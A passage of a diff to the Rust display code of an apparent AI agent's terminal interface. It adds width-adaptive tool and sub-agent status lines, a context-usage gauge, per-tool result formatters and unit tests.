+        Style::default().fg(Color::Rgb(255, 105, 105))
     } else {
-        Style::default().fg(Color::Rgb(180, 190, 210))
+        Style::default().fg(category.name_color())
     };
     let preview_style = Style::default()
-        .fg(Color::Rgb(110, 120, 140))
+        .fg(Color::Rgb(90, 102, 125))
         .add_modifier(Modifier::DIM);
     let result_style = if is_error {
-        Style::default().fg(Color::Rgb(235, 170, 170))
+        Style::default()
+            .fg(Color::Rgb(255, 125, 125))
+            .add_modifier(Modifier::BOLD)
     } else {
-        Style::default().fg(Color::Rgb(150, 210, 170))
+        Style::default().fg(Color::Rgb(148, 208, 168))
     };
     let dur_style = Style::default()
-        .fg(Color::Rgb(90, 95, 115))
+        .fg(Color::Rgb(72, 79, 98))
         .add_modifier(Modifier::DIM);
 
     vec![
         Span::styled("  ┊ ", bar_style),
         Span::styled(emoji.to_string(), emoji_style),
         Span::styled(format!(" {name_padded}"), name_style),
-        Span::styled(preview_part, preview_style),
+        Span::styled(preview_col, preview_style),
         Span::styled(result_part, result_style),
         Span::styled(format!("  {dur}"), dur_style),
     ]
@@ -983,99 +1327,247 @@ pub fn build_tool_done_line(
 ///
 /// Visual design:
 ///   ┊  ⌕  web search   query: "rust async"  ···
+#[allow(dead_code)]
 pub fn build_tool_running_line(
     tool_name: &str,
     args_json: &str,
     detail: Option<&str>,
     emoji_overrides: &std::collections::HashMap<String, String>,
 ) -> Vec<Span<'static>> {
-    let preview = extract_tool_preview(tool_name, args_json);
+    build_tool_running_line_width(
+        tool_name,
+        args_json,
+        detail,
+        emoji_overrides,
+        &DisplayWidths::DEFAULT,
+    )
+}
+
+pub fn build_tool_running_line_width(
+    tool_name: &str,
+    args_json: &str,
+    detail: Option<&str>,
+    emoji_overrides: &std::collections::HashMap<String, String>,
+    widths: &DisplayWidths,
+) -> Vec<Span<'static>> {
+    let preview = extract_tool_preview_width(tool_name, args_json, widths.preview);
     let emoji: &str = emoji_overrides
         .get(tool_name)
         .map(|s| s.as_str())
         .unwrap_or_else(|| tool_emoji(tool_name));
-    let label = tool_label(tool_name);
-    let name_padded = unicode_pad_right(&label, 18);
-    let preview_part = if preview.is_empty() {
-        String::new()
-    } else {
-        format!(" {preview}")
-    };
+    let category = tool_category(tool_name);
+    // FIX: truncate label + right-pad preview for column alignment (mirrors done-line).
+    let label = unicode_trunc(&tool_label(tool_name), widths.name);
+    let name_padded = unicode_pad_right(&label, widths.name);
+    let preview_col = format!(" {}", unicode_pad_right(&preview, widths.preview));
+    let detail_width = widths.result.max(20);
     let detail_part = detail
         .map(str::trim)
         .filter(|detail| !detail.is_empty())
-        .map(|detail| format!("  {}", unicode_trunc(detail, 54)))
+        .map(|detail| format!("  {}", unicode_trunc(detail, detail_width)))
         .unwrap_or_default();
 
     let bar_style = Style::default()
-        .fg(Color::Rgb(60, 60, 72))
+        .fg(Color::Rgb(55, 58, 70))
         .add_modifier(Modifier::DIM);
-    let indicator_style = Style::default().fg(Color::Rgb(77, 208, 225));
-    let name_style = Style::default().fg(Color::Rgb(150, 160, 180));
+    let indicator_style = Style::default().fg(category.name_color());
+    let name_style = Style::default().fg(category.name_color());
     let preview_style = Style::default()
-        .fg(Color::Rgb(100, 110, 130))
+        .fg(Color::Rgb(90, 102, 125))
         .add_modifier(Modifier::DIM);
     let running_style = Style::default()
-        .fg(Color::Rgb(77, 208, 225))
+        .fg(category.name_color())
         .add_modifier(Modifier::DIM);
 
     vec![
         Span::styled("  ┊ ", bar_style),
         Span::styled(emoji.to_string(), indicator_style),
         Span::styled(format!(" {name_padded}"), name_style),
-        Span::styled(preview_part, preview_style),
+        Span::styled(preview_col, preview_style),
         Span::styled(detail_part, preview_style),
         Span::styled("  ···".to_string(), running_style),
     ]
 }
 
-/// Build a compact delegated-child progress line for the transcript.
-pub fn build_subagent_event_line(
+// ── Sub-agent display lines ───────────────────────────────────────────────────
+//
+// Visual contract (mirrors build_tool_done_line_width):
+//
+//   ┊ →  [1/3]  goal preview...            write_file src/...    3.2s ···
+//   ┊ ✅  [1/3]  River poem (first line…)  · 1 call  gpt-5-mi  11.9s
+//   ┊ ❌  [2/3]  Error: context exceeded   · 3 calls claude-3   4.2s
+//
+// All columns use the same `DisplayWidths` as root tool lines so the two families
+// share a visual grid on the same terminal width.
+
+/// Build an in-flight "running" placeholder line for a delegated sub-agent.
+///
+/// Shown from `SubAgentStart` until `SubAgentFinish` replaces it in-place.
+/// `last_detail` is the most recent tool call or reasoning hint from the child.
+pub fn build_subagent_running_line_width(
     task_index: usize,
     task_count: usize,
-    label: &str,
-    detail: &str,
-    tone: &str,
+    goal: &str,
+    last_detail: Option<&str>,
+    elapsed_secs: u64,
+    widths: &DisplayWidths,
 ) -> Vec<Span<'static>> {
     let badge = format!("[{}/{}]", task_index + 1, task_count);
-    let (icon, icon_style, detail_style) = match tone {
-        "success" => (
-            "✅",
-            Style::default().fg(Color::Rgb(104, 196, 129)),
-            Style::default().fg(Color::Rgb(170, 210, 180)),
-        ),
-        "error" => (
-            "❌",
-            Style::default().fg(Color::Rgb(239, 83, 80)),
-            Style::default().fg(Color::Rgb(235, 170, 170)),
-        ),
-        _ => (
-            "🔀",
-            Style::default().fg(Color::Rgb(95, 170, 255)),
-            Style::default().fg(Color::Rgb(170, 190, 220)),
-        ),
+    // Budget: bar(4) + icon(3) + badge(8) + elapsed(6) + dots(5) = 26 chrome chars.
+    // Remaining split between goal and detail.
+    let goal_width = widths.preview;
+    let detail_width = widths.result.saturating_sub(16).max(16);
+
+    let goal_col = unicode_pad_right(&unicode_trunc(goal, goal_width), goal_width);
+    let detail_part = last_detail
+        .map(str::trim)
+        .filter(|d| !d.is_empty())
+        .map(|d| format!("  {}", unicode_trunc(d, detail_width)))
+        .unwrap_or_default();
+
+    let elapsed_str = format_duration_aligned(elapsed_secs * 1_000);
+
+    let bar_style = Style::default()
+        .fg(Color::Rgb(55, 60, 70))
+        .add_modifier(Modifier::DIM);
+    let icon_style = Style::default().fg(Color::Rgb(95, 175, 255)); // blue → "in progress"
+    let badge_style = Style::default()
+        .fg(Color::Rgb(115, 128, 150))
+        .add_modifier(Modifier::DIM);
+    let goal_style = Style::default().fg(Color::Rgb(185, 198, 218));
+    let detail_style = Style::default()
+        .fg(Color::Rgb(90, 102, 125))
+        .add_modifier(Modifier::DIM);
+    let running_style = Style::default()
+        .fg(Color::Rgb(95, 175, 255))
+        .add_modifier(Modifier::DIM);
+    let dur_style = Style::default()
+        .fg(Color::Rgb(72, 79, 98))
+        .add_modifier(Modifier::DIM);
+
+    vec![
+        Span::styled("  ┊ ", bar_style),
+        Span::styled("→ ", icon_style),
+        Span::styled(format!("{badge} "), badge_style),
+        Span::styled(goal_col, goal_style),
+        Span::styled(detail_part, detail_style),
+        Span::styled("  ···".to_string(), running_style),
+        Span::styled(format!("  {elapsed_str}"), dur_style),
+    ]
+}
+
+/// Build a completed sub-agent line (replaces the running placeholder in-place).
+///
+/// Structured columns mirror `build_tool_done_line_width`:
+/// `  ┊  ✅  [1/3]  summary text…   · N calls  model  duration`
+#[allow(clippy::too_many_arguments)]
+pub fn build_subagent_done_line_width(
+    task_index: usize,
+    task_count: usize,
+    is_error: bool,
+    duration_ms: u64,
+    api_calls: u32,
+    model: Option<&str>,
+    summary: &str,
+    widths: &DisplayWidths,
+) -> Vec<Span<'static>> {
+    let badge = format!("[{}/{}]", task_index + 1, task_count);
+    let dur = format_duration_aligned(duration_ms);
+
+    // Show first non-blank line of summary (or goal if summary empty).
+    let summary_first = summary
+        .lines()
+        .map(str::trim)
+        .find(|l| !l.is_empty())
+        .unwrap_or("completed");
+
+    // Stat pill: "· N calls  model-short"
+    let calls_str = if api_calls == 1 {
+        "· 1 call".to_string()
+    } else {
+        format!("· {api_calls} calls")
+    };
+    let model_short = model
+        .unwrap_or("")
+        .split('/')
+        .next_back()
+        .unwrap_or("")
+        .chars()
+        .take(10)
+        .collect::<String>();
+
+    // Chrome: bar(4) + icon(3) + badge(8) + stats_pill + dur(7) ≈ 30 chars.
+    // Stat pill itself: calls_str(9) + " " + model_short(10) = ~20 chars.
+    let summary_budget = widths.preview + widths.name;
+    let summary_col = unicode_trunc(summary_first, summary_budget);
+
+    let bar_style = Style::default()
+        .fg(Color::Rgb(55, 60, 70))
+        .add_modifier(Modifier::DIM);
+    let icon_style = if is_error {
+        Style::default()
+            .fg(Color::Rgb(255, 80, 80))
+            .add_modifier(Modifier::BOLD)
+    } else {
+        Style::default().fg(Color::Rgb(104, 196, 129))
+    };
+    let badge_style = Style::default()
+        .fg(Color::Rgb(115, 128, 150))
+        .add_modifier(Modifier::DIM);
+    let summary_style = if is_error {
+        Style::default()
+            .fg(Color::Rgb(255, 125, 125))
+            .add_modifier(Modifier::BOLD)
+    } else {
+        Style::default().fg(Color::Rgb(200, 210, 226))
+    };
+    let stats_style = Style::default()
+        .fg(Color::Rgb(100, 112, 135))
+        .add_modifier(Modifier::DIM);
+    let model_style = Style::default().fg(Color::Rgb(185, 145, 240)); // violet = Ai category
+    let dur_style = Style::default()
+        .fg(Color::Rgb(72, 79, 98))
+        .add_modifier(Modifier::DIM);
+
+    let icon: &str = if is_error { "❌" } else { "✅" };
+    let model_part = if model_short.is_empty() {
+        String::new()
+    } else {
+        format!("  {model_short}")
     };
 
     vec![
-        Span::styled(
-            "  │ ",
-            Style::default()
-                .fg(Color::Rgb(55, 60, 70))
-                .add_modifier(Modifier::DIM),
-        ),
+        Span::styled("  ┊ ", bar_style),
         Span::styled(format!("{icon} "), icon_style),
-        Span::styled(
-            format!("{} ", unicode_pad_right(&badge, 6)),
-            Style::default()
-                .fg(Color::Rgb(120, 130, 150))
-                .add_modifier(Modifier::DIM),
-        ),
-        Span::styled(
-            unicode_pad_right(&unicode_trunc(label, 28), 28),
-            Style::default().fg(Color::Rgb(210, 220, 235)),
-        ),
-        Span::styled(unicode_trunc(detail, 56), detail_style),
+        Span::styled(format!("{badge} "), badge_style),
+        Span::styled(summary_col, summary_style),
+        Span::styled(format!("  {calls_str}"), stats_style),
+        Span::styled(model_part, model_style),
+        Span::styled(format!("  {dur}"), dur_style),
     ]
+}
+
+/// Legacy wrapper kept for any remaining direct callers.
+/// New code should use [`build_subagent_running_line_width`] or
+/// [`build_subagent_done_line_width`] directly.
+#[allow(dead_code)]
+pub fn build_subagent_event_line(
+    task_index: usize,
+    task_count: usize,
+    _label: &str,
+    detail: &str,
+    tone: &str,
+) -> Vec<Span<'static>> {
+    let widths = &DisplayWidths::DEFAULT;
+    match tone {
+        "success" => build_subagent_done_line_width(
+            task_index, task_count, false, 0, 0, None, detail, widths,
+        ),
+        "error" => {
+            build_subagent_done_line_width(task_index, task_count, true, 0, 0, None, detail, widths)
+        }
+        _ => build_subagent_running_line_width(task_index, task_count, detail, None, 0, widths),
+    }
 }
 
 // ── Status-bar helpers ────────────────────────────────────────────────────────
@@ -1179,6 +1671,10 @@ pub fn tool_icon(name: &str) -> &'static str {
 /// Short preview for the live status bar during tool execution.
 /// Format: `tool name · key: value` (single line, truncated).
 pub fn tool_status_preview(tool_name: &str, args_json: &str) -> String {
+    tool_status_preview_width(tool_name, args_json, DisplayWidths::DEFAULT.status_preview)
+}
+
+pub fn tool_status_preview_width(tool_name: &str, args_json: &str, max_cols: usize) -> String {
     let display_name = tool_label(tool_name);
     let preview = extract_tool_preview(tool_name, args_json);
     let full = if preview.is_empty() {
@@ -1186,7 +1682,478 @@ pub fn tool_status_preview(tool_name: &str, args_json: &str) -> String {
     } else {
         format!("{display_name} · {preview}")
     };
-    unicode_trunc(&full, 45)
+    unicode_trunc(&full, max_cols)
+}
+
+// ── Context pressure gauge ──────────────────────────────────────────────────
+
+/// Build a compact context pressure gauge for the status bar.
+///
+/// Returns styled spans like: `ctx [▰▰▰▱▱] 52%`
+///
+/// Color tiers:
+/// - Cyan: < 50% (safe)
+/// - Yellow: 50–75% (warning)
+/// - Red: > 75% (critical)
+pub fn build_context_gauge(used_tokens: u64, context_window: u64) -> Vec<Span<'static>> {
+    if context_window == 0 {
+        return Vec::new();
+    }
+    let pct = ((used_tokens as f64 / context_window as f64) * 100.0).min(100.0);
+    let filled = ((pct / 100.0) * 5.0).round() as usize;
+    let empty = 5usize.saturating_sub(filled);
+
+    let color = if pct < 50.0 {
+        Color::Rgb(77, 208, 225) // cyan
+    } else if pct < 75.0 {
+        Color::Rgb(255, 200, 50) // yellow
+    } else {
+        Color::Rgb(239, 83, 80) // red
+    };
+
+    let gauge_str = format!("{}{}", "▰".repeat(filled), "▱".repeat(empty),);
+
+    vec![
+        Span::styled(
+            " ctx [",
+            Style::default()
+                .fg(Color::Rgb(100, 105, 120))
+                .add_modifier(Modifier::DIM),
+        ),
+        Span::styled(gauge_str, Style::default().fg(color)),
+        Span::styled(
+            format!("] {:.0}% ", pct),
+            Style::default()
+                .fg(Color::Rgb(100, 105, 120))
+                .add_modifier(Modifier::DIM),
+        ),
+    ]
+}
+
+// ── Tool result formatting ────────────────────────────────────────────────────
+
+/// Parse `key=value` from a structured bracket-header such as:
+///
+/// ```text
+/// [terminal_result status=success backend=local cwd=/tmp exit_code=0]
+/// ```
+///
+/// Handles values that run up to the next space, `]`, or end of string.
+fn parse_header_attr<'a>(header: &'a str, key: &str) -> Option<&'a str> {
+    let needle = format!("{key}=");
+    let start = header.find(needle.as_str())? + needle.len();
+    let rest = &header[start..];
+    let end = rest
+        .find(|c: char| c == ' ' || c == ']')
+        .unwrap_or(rest.len());
+    Some(&rest[..end]).filter(|v| !v.is_empty())
+}
+
+/// Format a `terminal` tool result for compact display.
+///
+/// The terminal tool prefixes output with a structured header line:
+/// ```text
+/// [terminal_result status=success backend=local cwd=/proj exit_code=0]
+/// stdout line 1
+/// stdout line 2
+/// ```
+/// This function renders it as `✓ 0  first-output-line` or `✗ N  first-error-line`.
+fn format_terminal_result(result: &str, max_cols: usize) -> String {
+    let mut lines_iter = result.lines();
+    let header = lines_iter.next().unwrap_or("");
+
+    let exit_code: i32 = parse_header_attr(header, "exit_code")
+        .and_then(|v| v.parse().ok())
+        .unwrap_or(-1);
+    let ok = exit_code == 0;
+    let badge = if ok {
+        format!("✓ {exit_code}")
+    } else {
+        format!("✗ {exit_code}")
+    };
+
+    let output_first = lines_iter
+        .map(str::trim)
+        .find(|l| !l.is_empty())
+        .unwrap_or("");
+
+    if output_first.is_empty() || badge.width() + 2 >= max_cols {
+        return unicode_trunc(&badge, max_cols);
+    }
+    let detail_budget = max_cols.saturating_sub(badge.width() + 2);
+    unicode_trunc(
+        &format!("{}  {}", badge, unicode_trunc(output_first, detail_budget)),
+        max_cols,
+    )
+}
+
+/// Format an `execute_code` JSON result for compact display.
+///
+/// JSON shape: `{"status":"success","output":"…","tool_calls_made":N,"duration_seconds":N}`
+///   or `{"status":"error","error":"…","output":"…"}`
+fn format_execute_code_result(val: &serde_json::Value, max_cols: usize) -> String {
+    let status = val
+        .get("status")
+        .and_then(|v| v.as_str())
+        .unwrap_or("unknown");
+    let ok = status == "success";
+    let badge = if ok { "✓" } else { "✗" };
+
+    // Prefer error message for failures; output for success.
+    let content = if !ok {
+        val.get("error")
+            .or_else(|| val.get("output"))
+            .and_then(|v| v.as_str())
+    } else {
+        val.get("output")
+            .or_else(|| val.get("error"))
+            .and_then(|v| v.as_str())
+    }
+    .unwrap_or("")
+    .trim();
+
+    let first_line = content
+        .lines()
+        .map(str::trim)
+        .find(|l| !l.is_empty())
+        .unwrap_or("");
+
+    if first_line.is_empty() {
+        return unicode_trunc(&format!("{badge} {status}"), max_cols);
+    }
+    let badge_part = format!("{badge} {status}");
+    let detail_budget = max_cols.saturating_sub(badge_part.width() + 2);
+    if detail_budget < 4 {
+        return unicode_trunc(&badge_part, max_cols);
+    }
+    unicode_trunc(
+        &format!(
+            "{}  {}",
+            badge_part,
+            unicode_trunc(&oneline(first_line), detail_budget)
+        ),
+        max_cols,
+    )
+}
+
+/// Format a `web_search` JSON result: `N results · first-title`.
+fn format_web_search_result(val: &serde_json::Value, max_cols: usize) -> String {
+    let results = val
+        .get("results")
+        .and_then(|v| v.as_array())
+        .map(|a| a.as_slice())
+        .unwrap_or(&[]);
+    let count = results.len();
+    if count == 0 {
+        return unicode_trunc("no results", max_cols);
+    }
+    let count_part = if count == 1 {
+        "1 result".to_string()
+    } else {
+        format!("{count} results")
+    };
+    let first_title = results
+        .first()
+        .and_then(|item| item.get("title").or_else(|| item.get("name")))
+        .and_then(|v| v.as_str())
+        .map(oneline)
+        .unwrap_or_default();
+    if first_title.is_empty() || count_part.width() + 4 >= max_cols {
+        return unicode_trunc(&count_part, max_cols);
+    }
+    let title_budget = max_cols.saturating_sub(count_part.width() + 4);
+    if title_budget < 4 {
+        return unicode_trunc(&count_part, max_cols);
+    }
+    unicode_trunc(
+        &format!(
+            "{count_part}  · {}",
+            unicode_trunc(&first_title, title_budget)
+        ),
+        max_cols,
+    )
+}
+
+/// Format a `web_extract` JSON result: `N.Nk chars · page-title`.
+fn format_web_extract_result(val: &serde_json::Value, max_cols: usize) -> String {
+    let result_node = val.get("result");
+    let title = result_node
+        .and_then(|r| r.get("title").or_else(|| r.get("name")))
+        .and_then(|v| v.as_str())
+        .map(oneline);
+    let char_count = result_node
+        .and_then(|r| r.get("content").or_else(|| r.get("text")))
+        .and_then(|v| v.as_str())
+        .map(|s| s.len())
+        .or_else(|| {
+            val.get("results").and_then(|v| v.as_array()).map(|arr| {
+                arr.iter()
+                    .filter_map(|item| {
+                        item.get("content")
+                            .or_else(|| item.get("text"))
+                            .and_then(|v| v.as_str())
+                            .map(|s| s.len())
+                    })
+                    .sum::<usize>()
+            })
+        })
+        .unwrap_or(0);
+
+    let size_part = if char_count >= 1_000 {
+        format!("{:.1}k chars", char_count as f64 / 1_000.0)
+    } else if char_count > 0 {
+        format!("{char_count} chars")
+    } else {
+        "extracted".to_string()
+    };
+
+    match title.filter(|t| !t.is_empty()) {
+        Some(t) if size_part.width() + 4 < max_cols => {
+            let title_budget = max_cols.saturating_sub(size_part.width() + 4);
+            if title_budget < 4 {
+                unicode_trunc(&size_part, max_cols)
+            } else {
+                unicode_trunc(
+                    &format!("{size_part}  · {}", unicode_trunc(&t, title_budget)),
+                    max_cols,
+                )
+            }
+        }
+        _ => unicode_trunc(&size_part, max_cols),
+    }
+}
+
+/// Format a `web_crawl` JSON result: `N pages crawled`.
+fn format_web_crawl_result(val: &serde_json::Value, max_cols: usize) -> String {
+    let count = val
+        .get("pages")
+        .and_then(|v| v.as_array())
+        .map(|a| a.len())
+        .or_else(|| {
+            val.get("page_count")
+                .and_then(|v| v.as_u64())
+                .map(|n| n as usize)
+        })
+        .unwrap_or(0);
+    if count == 0 {
+        unicode_trunc("crawled", max_cols)
+    } else if count == 1 {
+        unicode_trunc("1 page crawled", max_cols)
+    } else {
+        unicode_trunc(&format!("{count} pages crawled"), max_cols)
+    }
+}
+
+/// Format a `session_search` JSON result: `N results`.
+fn format_session_search_result(val: &serde_json::Value, max_cols: usize) -> String {
+    let count = val
+        .get("results")
+        .and_then(|v| v.as_array())
+        .map(|a| a.len())
+        .or_else(|| {
+            val.get("sessions")
+                .and_then(|v| v.as_array())
+                .map(|a| a.len())
+        })
+        .unwrap_or(0);
+    if count == 0 {
+        unicode_trunc("no results", max_cols)
+    } else if count == 1 {
+        unicode_trunc("1 result", max_cols)
+    } else {
+        unicode_trunc(&format!("{count} results"), max_cols)
+    }
+}
+
+/// Format a `ha_*` tool JSON result: `✓ state` / `✗ error`.
+fn format_ha_result(val: &serde_json::Value, max_cols: usize) -> String {
+    let is_failure = val
+        .get("success")
+        .and_then(|v| v.as_bool())
+        .map(|v| !v)
+        .unwrap_or(false)
+        || val.get("error").is_some();
+    if is_failure {
+        let err = val
+            .get("error")
+            .and_then(|v| v.as_str())
+            .map(oneline)
+            .unwrap_or_else(|| "failed".to_string());
+        unicode_trunc(&format!("✗ {err}"), max_cols)
+    } else {
+        let state = val.get("state").and_then(|v| v.as_str()).unwrap_or("ok");
+        unicode_trunc(&format!("✓ {state}"), max_cols)
+    }
+}
+
+/// Format a tool result string for the **compact done-line** and the **verbose result line**.
+///
+/// Applies per-tool rich formatting (exit codes, counts, titles) and falls back to
+/// first-line truncation for tools without a dedicated formatter.
+///
+/// # Design
+///
+/// - One central function (`format_tool_result`) replaces all direct `unicode_trunc(result, …)` calls.
+/// - Per-tool helpers are private; callers only know `format_tool_result`.
+/// - Adding a new tool formatter requires only a new `match` arm — no call-site changes.
+pub fn format_tool_result(tool_name: &str, result: &str, max_cols: usize) -> String {
+    let result_trimmed = result.trim();
+    if result_trimmed.is_empty() {
+        return String::new();
+    }
+
+    // ── 1. terminal — structured header line ────────────────────────────
+    // Only apply the structured parser when the result actually carries
+    // the `[terminal_result …]` header produced by the tool's execute()
+    // implementation.  Test mocks and background-task proxies may pass
+    // plain human-readable strings; those fall through to the default path.
+    if tool_name == "terminal" && result_trimmed.starts_with("[terminal_result ") {
+        return format_terminal_result(result_trimmed, max_cols);
+    }
+
+    // ── 2. JSON-returning tools ─────────────────────────────────────────
+    if let Ok(val) = serde_json::from_str::<serde_json::Value>(result_trimmed) {
+        match tool_name {
+            "execute_code" => return format_execute_code_result(&val, max_cols),
+            "web_search" => return format_web_search_result(&val, max_cols),
+            "web_extract" => return format_web_extract_result(&val, max_cols),
+            "web_crawl" => return format_web_crawl_result(&val, max_cols),
+            "session_search" => return format_session_search_result(&val, max_cols),
+            _ if tool_name.starts_with("ha_") => return format_ha_result(&val, max_cols),
+            _ => {}
+        }
+    }
+
+    // ── 3. Plain-text tools with known formats ──────────────────────────
+    match tool_name {
+        "write_file" => {
+            // "Wrote N bytes to 'path'"
+            // Show `✓ N bytes` — concise success signal with size.
+            if let Some(rest) = result_trimmed.strip_prefix("Wrote ") {
+                // rest = "N bytes to 'path'"
+                let end = rest.find(" to ").unwrap_or(rest.len());
+                let size_part = rest[..end].trim();
+                if !size_part.is_empty() {
+                    return unicode_trunc(&format!("✓ {size_part}"), max_cols);
+                }
+            }
+            return unicode_trunc(&oneline(result_trimmed), max_cols);
+        }
+        "apply_patch" => {
+            // "apply_patch succeeded. Modified: src/a.rs; Created: src/b.rs"
+            if result_trimmed.contains("succeeded") {
+                let detail = result_trimmed
+                    .find(". ")
+                    .map(|i| &result_trimmed[i + 2..])
+                    .unwrap_or(result_trimmed)
+                    .trim();
+                // Count comma-separated items in each section.
+                let count_section = |label: &str, text: &str| -> usize {
+                    text.split(label)
+                        .nth(1)
+                        .map(|s| s.split(';').next().unwrap_or(""))
+                        .map(|s| s.split(',').filter(|t| !t.trim().is_empty()).count())
+                        .unwrap_or(0)
+                };
+                let total = count_section("Modified: ", detail)
+                    + count_section("Created: ", detail)
+                    + count_section("Deleted: ", detail);
+                let summary = if total == 0 {
+                    "✓ ok".to_string()
+                } else if total == 1 {
+                    "✓ 1 file".to_string()
+                } else {
+                    format!("✓ {total} files")
+                };
+                return unicode_trunc(&summary, max_cols);
+            }
+        }
+        "read_file" => {
+            // Result is the raw file content.  Show line count + first meaningful line.
+            let n = result_trimmed.lines().count();
+            let count_part = if n == 1 {
+                "1 line".to_string()
+            } else {
+                format!("{n} lines")
+            };
+            let first_code = result_trimmed
+                .lines()
+                .map(str::trim)
+                .find(|l| !l.is_empty() && !l.starts_with("//") && !l.starts_with('#'))
+                .unwrap_or("");
+            if first_code.is_empty() || count_part.width() + 2 >= max_cols {
+                return unicode_trunc(&count_part, max_cols);
+            }
+            let detail_budget = max_cols.saturating_sub(count_part.width() + 2);
+            return unicode_trunc(
+                &format!(
+                    "{}  {}",
+                    count_part,
+                    unicode_trunc(&oneline(first_code), detail_budget)
+                ),
+                max_cols,
+            );
+        }
+        "search_files" => {
+            // Grep output — count non-blank, non-separator lines as "matches".
+            let match_count = result_trimmed
+                .lines()
+                .filter(|l| !l.trim().is_empty() && !l.starts_with("---"))
+                .count();
+            return if match_count == 0 {
+                unicode_trunc("no matches", max_cols)
+            } else if match_count == 1 {
+                unicode_trunc("1 match", max_cols)
+            } else {
+                unicode_trunc(&format!("{match_count} matches"), max_cols)
+            };
+        }
+        "memory" => {
+            // "Added to user memory file." etc.
+            if result_trimmed.starts_with("Added")
+                || result_trimmed.starts_with("Updated")
+                || result_trimmed.starts_with("Removed")
+                || result_trimmed.contains("success")
+            {
+                return unicode_trunc("✓ saved", max_cols);
+            }
+        }
+        "todo" | "manage_todo_list" => {
+            return unicode_trunc("✓ plan updated", max_cols);
+        }
+        "generate_image" | "image_generate" => {
+            // Usually an image path or URL — show just the filename.
+            let fname = result_trimmed
+                .lines()
+                .next()
+                .unwrap_or(result_trimmed)
+                .trim()
+                .split('/')
+                .next_back()
+                .unwrap_or(result_trimmed);
+            return unicode_trunc(&oneline(fname), max_cols);
+        }
+        "text_to_speech" => {
+            let fname = result_trimmed
+                .lines()
+                .next()
+                .unwrap_or(result_trimmed)
+                .trim()
+                .split('/')
+                .next_back()
+                .unwrap_or(result_trimmed);
+            return unicode_trunc(&oneline(fname), max_cols);
+        }
+        _ => {}
+    }
+
+    // ── 4. Default: first non-empty line, collapsed whitespace, truncated ──
+    let first_line = result_trimmed
+        .lines()
+        .map(str::trim)
+        .find(|l| !l.is_empty())
+        .unwrap_or(result_trimmed);
+    unicode_trunc(&oneline(first_line), max_cols)
 }
 
 // ── Unit tests ────────────────────────────────────────────────────────────────
@@ -1382,8 +2349,12 @@ mod tests {
             .iter()
             .map(|span| span.content.as_ref())
             .collect::<String>();
-        assert!(joined.contains("src/main.rs"));
-        assert!(joined.contains("-> Wrote 42 bytes"));
+        // The result column now shows the rich format (✓ N bytes) rather than raw text.
+        assert!(joined.contains("src/main.rs"), "should contain path in args preview");
+        assert!(
+            joined.contains("✓ 42 bytes"),
+            "result should use rich write_file format, got: {joined}"
+        );
     }
 
     #[test]
@@ -1402,5 +2373,392 @@ mod tests {
         // Already at target width — no padding
         let exact = unicode_pad_right("1234567890", 10);
         assert_eq!(exact, "1234567890");
+    }
+
+    // ── DisplayWidths tests ─────────────────────────────────────────
+
+    #[test]
+    fn test_display_widths_default_for_narrow() {
+        let w = DisplayWidths::from_terminal_width(80);
+        assert_eq!(w.name, DisplayWidths::DEFAULT.name);
+        assert_eq!(w.preview, DisplayWidths::DEFAULT.preview);
+    }
+
+    #[test]
+    fn test_display_widths_scales_for_wide_terminal() {
+        let w = DisplayWidths::from_terminal_width(160);
+        assert!(
+            w.preview > 44,
+            "preview should be wider than default 44, got {}",
+            w.preview
+        );
+        assert!(
+            w.result > 52,
+            "result should be wider than default 52, got {}",
+            w.result
+        );
+        assert!(
+            w.verbose_content > 108,
+            "verbose should be wider than 108, got {}",
+            w.verbose_content
+        );
+    }
+
+    #[test]
+    fn test_display_widths_very_narrow() {
+        let w = DisplayWidths::from_terminal_width(40);
+        assert_eq!(w.name, DisplayWidths::DEFAULT.name);
+        assert!(w.preview >= 20);
+        assert!(w.result >= 20);
+    }
+
+    // ── Context gauge tests ─────────────────────────────────────────
+
+    #[test]
+    fn test_context_gauge_zero_window() {
+        let spans = build_context_gauge(1000, 0);
+        assert!(spans.is_empty());
+    }
+
+    #[test]
+    fn test_context_gauge_low_usage() {
+        let spans = build_context_gauge(20_000, 128_000);
+        let text: String = spans.iter().map(|s| s.content.as_ref()).collect();
+        assert!(text.contains("▰"), "should have filled chars");
+        assert!(text.contains("▱"), "should have empty chars");
+        assert!(text.contains("16%"), "should show percentage, got: {text}");
+    }
+
+    #[test]
+    fn test_context_gauge_high_usage() {
+        let spans = build_context_gauge(100_000, 128_000);
+        let text: String = spans.iter().map(|s| s.content.as_ref()).collect();
+        assert!(text.contains("78%"), "should show percentage, got: {text}");
+    }
+
+    #[test]
+    fn test_context_gauge_full() {
+        let spans = build_context_gauge(128_000, 128_000);
+        let text: String = spans.iter().map(|s| s.content.as_ref()).collect();
+        assert!(text.contains("▰▰▰▰▰"), "should be full");
+        assert!(text.contains("100%"), "should show 100%, got: {text}");
+    }
+
+    // ── Width-adaptive tool line tests ──────────────────────────────
+
+    #[test]
+    fn test_build_tool_done_line_width_uses_wider_result() {
+        let wide = DisplayWidths::from_terminal_width(160);
+        let long_result = "a".repeat(100);
+        let spans = build_tool_done_line_width(
+            "web_search",
+            r#"{"query":"test"}"#,
+            Some(&long_result),
+            100,
+            false,
+            &std::collections::HashMap::new(),
+            &wide,
+        );
+        let text: String = spans.iter().map(|s| s.content.as_ref()).collect();
+        // With wider widths, more of the result should be visible
+        let result_segment = text.split("→ ").nth(1).unwrap_or("");
+        assert!(
+            result_segment.len() > 52,
+            "wider terminal should show more result"
+        );
+    }
+
+    #[test]
+    fn test_extract_tool_preview_width_respects_limit() {
+        let long_query = "a".repeat(200);
+        let args = format!(r#"{{"query": "{long_query}"}}"#);
+        let narrow = extract_tool_preview_width("web_search", &args, 30);
+        assert!(
+            narrow.width() <= 30,
+            "narrow preview too wide: {}",
+            narrow.width()
+        );
+        let wide = extract_tool_preview_width("web_search", &args, 80);
+        assert!(
+            wide.width() <= 80,
+            "wide preview too wide: {}",
+            wide.width()
+        );
+        assert!(
+            wide.width() > narrow.width(),
+            "wide should show more than narrow"
+        );
+    }
+
+    // ── format_tool_result tests ────────────────────────────────────
+
+    #[test]
+    fn test_format_tool_result_empty() {
+        assert_eq!(format_tool_result("terminal", "", 80), "");
+        assert_eq!(format_tool_result("web_search", "   ", 80), "");
+    }
+
+    #[test]
+    fn test_format_tool_result_terminal_success() {
+        let result =
+            "[terminal_result status=success backend=local cwd=/proj exit_code=0]\ncargo build\n";
+        let out = format_tool_result("terminal", result, 80);
+        assert!(out.contains("✓ 0"), "should show ✓ exit 0, got: {out}");
+        assert!(
+            out.contains("cargo build"),
+            "should show stdout, got: {out}"
+        );
+    }
+
+    #[test]
